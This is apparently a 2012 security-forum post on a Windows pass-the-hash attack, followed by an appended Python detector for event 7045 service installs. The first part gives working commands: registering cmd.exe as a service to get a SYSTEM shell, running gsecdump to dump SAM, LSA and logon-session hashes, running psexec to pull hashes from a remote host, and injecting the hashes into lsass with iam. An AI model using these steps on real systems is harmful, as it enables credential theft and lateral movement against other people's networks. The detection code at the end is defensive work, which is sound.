Hash injection attack
Original poster, posted on 2012-11-6 21:09:29
To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - [url]www.sysinternals.com[/url]

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.

A tip: you can use iam from the pshtools toolkit to load the hashes just grabbed with gsecdump into the local lsass process, which is what makes the hash injection attack work. The foreigners really are good at this; administrators are going to be busy. The LM/NT hashes picked up during ARP spoofing, and the ones obtained with gethash, actually never need to be cracked at all; it is simply a matter of using the tool. As the original article puts it, whether the password is 4 characters or 127, once you have the hash it is 100% done.
Original source: [url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]

I had a look at the original source; it seems to be from /2007/03/16/. Depressing, what a gap.
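Both steps quoted in the post leave a visible trace on the target: `sc create` and PsExec's `-s -c` each register a new Windows service, and the System log records every service installation as event 7045 ("A service was installed in the system") with the service name, the service file name, type, start type and account. The following is an added detection example written from the defender's side; it is not code from the post or from the TrueSec article. It parses a constructed pipe-separated export of such events (the export format, the `executable_of` helper and the `SAMPLE_LOG` lines are assumptions made here) and flags two patterns that the post's own transcript produces: a command interpreter registered as the service binary (the `cmd.exe /K start` trick), and a service named PSEXESVC, which is the default name PsExec installs. Listing `powershell.exe` and `command.com` beside `cmd.exe` is a generalisation of the post's single case.

```python
"""Flag event-7045 service installs that match the sc/psexec pattern in the post.

Added example, not from the post or the original article. The log below is a
CONSTRUCTED sample in an assumed export format:
    event_id|service_name|service_file_name|service_type|start_type|account
mirroring the fields of the real Windows System event 7045.
"""
from dataclasses import dataclass

# Constructed sample records. Lines 1 and 2 correspond to the two commands in
# the post; the rest are benign or unrelated events the rules must ignore.
SAMPLE_LOG = """\
7045|shellcmdline|C:\\WINDOWS\\system32\\cmd.exe /K start|user mode service|demand start|LocalSystem
7045|PSEXESVC|%SystemRoot%\\PSEXESVC.exe|user mode service|demand start|LocalSystem
7045|Spooler|C:\\WINDOWS\\system32\\spoolsv.exe|user mode service|auto start|LocalSystem
7036|shellcmdline|||||
7045|SvcBackup|C:\\Tools\\backup.exe --daemon|user mode service|auto start|NT AUTHORITY\\NetworkService
"""

# Interpreters that should never be the image of a service (cmd.exe is the
# case from the post; the other two are an assumed generalisation).
INTERPRETERS = {"cmd.exe", "command.com", "powershell.exe"}
# Default service name registered by PsExec when it runs a remote command.
PSEXEC_SERVICE_NAMES = {"psexesvc"}


@dataclass(frozen=True)
class ServiceInstall:
    service_name: str
    file_name: str
    service_type: str
    start_type: str
    account: str


@dataclass(frozen=True)
class Finding:
    service_name: str
    reason: str


def parse_7045(line: str):
    """Return a ServiceInstall for a 7045 record, or None for anything else."""
    parts = line.rstrip("\n").split("|")
    if len(parts) != 6 or parts[0] != "7045":
        return None
    return ServiceInstall(*parts[1:])


def executable_of(file_name: str) -> str:
    """Basename (lower-cased) of the program in a service command line.

    Handles both a quoted path with spaces and a bare path followed by
    arguments, which is how `sc create binpath=` values usually appear.
    """
    cmd = file_name.strip()
    if cmd.startswith('"'):
        exe = cmd[1:].split('"', 1)[0]
    else:
        exe = cmd.split(" ", 1)[0]
    return exe.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check(install: ServiceInstall) -> list:
    """Apply the two rules to one service-install record."""
    findings = []
    if executable_of(install.file_name) in INTERPRETERS:
        findings.append(Finding(install.service_name,
                                "command interpreter registered as service binary"))
    if install.service_name.lower() in PSEXEC_SERVICE_NAMES:
        findings.append(Finding(install.service_name, "PsExec service installed"))
    return findings


def scan(log_text: str) -> list:
    """Run the rules over every line of an exported log and collect findings."""
    findings = []
    for line in log_text.splitlines():
        install = parse_7045(line)
        if install is None:
            continue  # not a service-install event, or malformed record
        findings.extend(check(install))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"{finding.service_name}: {finding.reason}")
```

Run against the constructed log, `scan` reports `shellcmdline` (interpreter as service binary) and `PSEXESVC` (PsExec service), and ignores the Spooler, backup and 7036 records. A real deployment would feed it a 7045 export from the System log and pair it with the service's deletion event, since the post shows the service being removed within seconds of creation.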